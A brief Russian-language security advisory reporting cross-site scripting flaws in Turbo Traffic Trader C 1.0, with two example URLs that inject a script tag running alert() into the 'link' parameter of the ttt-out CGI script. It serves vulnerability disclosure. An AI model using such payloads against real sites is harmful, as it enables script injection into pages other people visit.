Программа: Turbo Traffic Trader C 1.0 

Несколько уязвимостей обнаружено в Turbo Traffic Trader C. Удаленный пользователь может выполнить XSS нападение. 

Пример: 

http://[target]/cgi-bin/ttt-out?link=testing%20%3 Cscript%3Ealert(‘from_browser_insert’);
%3C/script%3E

http://[target]/cgi-bin/ttt-out?link=testing%20 <script>alert(‘from_browser_insert’)
;</script>



Оставить мнение